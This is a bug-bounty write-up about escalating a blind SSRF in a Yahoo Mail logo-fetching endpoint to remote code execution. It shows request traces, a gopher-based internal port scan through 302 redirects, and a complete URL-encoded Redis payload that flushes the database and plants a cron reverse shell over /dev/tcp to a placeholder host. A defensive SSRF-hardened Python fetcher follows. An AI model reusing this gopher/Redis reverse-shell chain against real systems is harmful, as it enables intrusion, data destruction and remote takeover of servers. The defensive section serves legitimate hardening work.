Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail

Part 1: Recon

GET /xxx/logoGrabber?url=http://example.com
Host: mail.yahoo.com
...
{"responseTime":"99999ms","grabbedUrl":"http://example.com","urlInfo":{"pageTitle":"Example Title","pageLogo":"pagelogourl"}}

Part 2: Discovering SSRF

GET /xxx/logoGrabber?url=http://somecorpsite.yahoo.com
Host: mail.yahoo.com
...
{"responseTime":"9ms","grabbedUrl":"http://somecorpsite.yahoo.com","urlInfo":{"pageTitle":"INTERNAL PAGE TITLE","pageLogo":"http://somecorpsite.yahoo.com/logos/logo.png"}}

Part 3: The RCE

GET /xxx/logoGrabber?url=gopher://myburpcollaboratorurl
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
302redirect → gopher://127.0.0.1:3306 [Response time: 3000ms] - CLOSED
302redirect → gopher://127.0.0.1:9000 [Response time: 2500ms] - CLOSED
302redirect → gopher://127.0.0.1:6379 [Response time: 500ms] - OPEN
etc…
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
python3 302redirect.py port "gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...

big hax
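Added example, written from the defender's side and not code from the original write-up or from Yahoo: a hardened fetcher for a "grab the title and logo of this URL" endpoint. The chain in Parts 2 and 3 depends on three things the fetcher did not do: reject non-HTTP schemes, reject destinations that resolve to loopback or internal ranges, and re-run those checks on the target of a 302 before connecting to it. The code below enforces all three on every hop. Function names, the resolver/request injection points and every host name and address in DEMO_DNS / DEMO_HTTP are assumptions constructed so the demo runs offline.

```python
# Added example (not from the original post): SSRF-hardened URL fetcher.
# Checks: scheme/port allow-list, public-IP-only destinations, and the same
# checks repeated on every redirect hop. DEMO_* fixtures are constructed.
import http.client
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}        # nothing like 6379, 9000 or 3306 gets through
MAX_REDIRECTS = 3
MAX_BODY = 1 << 20               # a title/logo scrape never needs more than 1 MiB


def _is_public(ip_text):
    """True only for a globally routable unicast address."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped      # ::ffff:127.0.0.1 is still loopback
    return ip.is_global and not (ip.is_loopback or ip.is_link_local
                                 or ip.is_multicast or ip.is_reserved)


def validate_target(url, resolver=socket.getaddrinfo):
    """Return (ok, reason). `resolver` is injectable so the demo runs offline."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "bad port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        infos = resolver(parts.hostname, port, type=socket.SOCK_STREAM)
    except OSError:              # socket.gaierror is a subclass of OSError
        return False, "DNS resolution failed"
    addrs = {info[4][0] for info in infos}
    if not addrs:
        return False, "no addresses"
    # Every record must be public: a name answering with one public and one
    # loopback address must not pass.
    for addr in sorted(addrs):
        if not _is_public(addr):
            return False, "%s resolves to non-public %s" % (parts.hostname, addr)
    return True, "ok"


def _http_request(url):
    """Plain GET with no automatic redirects; returns (status, headers, body)."""
    parts = urlsplit(url)
    cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = cls(parts.hostname, parts.port, timeout=5)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    conn.request("GET", path, headers={"User-Agent": "logo-grabber/1.0"})
    resp = conn.getresponse()
    body = resp.read(MAX_BODY)
    conn.close()
    return resp.status, {k.lower(): v for k, v in resp.getheaders()}, body


def fetch_with_rechecks(url, request=_http_request, resolver=socket.getaddrinfo):
    """Follow at most MAX_REDIRECTS hops, validating each Location before use."""
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = validate_target(current, resolver)
        if not ok:
            raise ValueError("refusing %s: %s" % (current, reason))
        status, headers, body = request(current)
        if status in (301, 302, 303, 307, 308) and "location" in headers:
            # A relative Location resolves against the current URL; the result
            # goes back through validate_target on the next iteration.
            current = urljoin(current, headers["location"])
            continue
        return status, body
    raise ValueError("too many redirects")


# Constructed offline fixtures (assumed names; 93.184.216.x stand in for
# public addresses, 10.0.0.5 for an internal host).
DEMO_DNS = {
    "example.com": ["93.184.216.34"],
    "redir.example": ["93.184.216.35"],
    "intranet.example": ["10.0.0.5"],
    "rebind.example": ["93.184.216.36", "127.0.0.1"],
}
DEMO_HTTP = {
    "http://example.com/": (200, {}, b"<title>Example Title</title>"),
    "http://redir.example/ok": (302, {"location": "http://example.com/"}, b""),
    "http://redir.example/": (302, {"location": "gopher://127.0.0.1:6379/"}, b""),
}


def demo_resolver(host, port, **_kwargs):
    if host not in DEMO_DNS:
        raise socket.gaierror("constructed NXDOMAIN")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port)) for ip in DEMO_DNS[host]]


def demo_request(url):
    return DEMO_HTTP[url]


if __name__ == "__main__":
    for u in ["http://example.com/", "gopher://127.0.0.1:6379/",
              "http://intranet.example/", "http://rebind.example/"]:
        print(u, validate_target(u, demo_resolver))
    print(fetch_with_rechecks("http://redir.example/ok", demo_request, demo_resolver))
    try:
        fetch_with_rechecks("http://redir.example/", demo_request, demo_resolver)
    except ValueError as e:
        print("blocked:", e)
```

The redirect in the write-up (HTTP 302 to `gopher://127.0.0.1:6379`) is refused at the second iteration of `fetch_with_rechecks`, before any socket is opened, because `validate_target` sees the scheme. One residual gap this example does not close: `_http_request` lets `http.client` resolve the name a second time, so a name whose answer changes between the check and the connect (DNS rebinding) could still differ; pinning the connection to the address that was validated closes that, at the cost of handling TLS SNI and certificate names yourself.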